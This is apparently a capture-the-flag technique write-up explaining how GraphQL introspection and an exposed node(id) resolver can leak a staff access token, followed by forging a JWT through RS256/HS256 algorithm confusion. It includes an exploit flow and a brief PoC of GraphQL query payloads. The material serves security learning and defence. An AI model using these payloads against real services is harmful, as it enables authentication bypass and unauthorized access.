pwneglyph logo

Note

web python graphql introspection jwt algorithm-confusion authentication-bypass

Introspect a GraphQL schema to leak a token via an over-trusted node resolver, then forge a JWT through RS256/HS256 confusion.

GraphQL Introspection + Internal Leak + JWT Algorithm Confusion

GraphQL often exposes a rich self-describing schema, and developers over-trust generic resolvers like node(id) or admin object types meant to be internal. The auth break is two-stage: GraphQL leaks a sensitive token, then JWT verification accepts an algorithm family that lets a public key become an HMAC secret.

Why It Works

  • Universal node(id) interfaces and exposed internal fields (accessToken, email, role) leak more than intended.
  • JWT libraries without a strict allowed-algorithm list let an attacker sign with HS256 using the RSA public material as the HMAC secret.

Vulnerable Pattern

  • Publicly reachable /graphql, enabled introspection, universal node resolvers, exposed internal fields.
  • JWT verification that doesn't pin the algorithm, or reuses RSA public material incorrectly during HS256 verification.

Exploit Flow

  1. Introspect the schema and map object types — especially admin, staff, or global node(id) interfaces.
  2. Find fields exposing bearer tokens, API keys, refresh tokens, or user IDs that unlock another surface.
  3. Inspect JWKS / public-key endpoints / source to see whether RS256 can be coerced into HS256.
  4. Forge a token with the right claims and replay it against the secondary surface (internal upload, admin API).

Variations

  • If introspection is disabled, probe common field names through errors, public docs, or frontend bundles.
  • If JWT confusion is blocked, leaked tokens may still be valid as-is against another internal backend.

Common Blockers

  • Strict algorithm allowlists, kid pinning, auth middleware on node(), or schema hardening that strips sensitive fields at the resolver level.

PoC Sketch

{"query":"{__schema{types{name}}}"}
{"query":"{node(id:\"...\"){... on StaffNode { accessToken }}}"}
# if HS256 accepted: sign a new JWT with the RSA public key as the HMAC secret

Good Situations To Use It

  • An exposed /graphql with introspection on.
  • A node(id) resolver or admin type that returns tokens.
  • A JWT auth layer that doesn't pin the algorithm.

Sources

  • 0xFUN2026/web/skyport_ops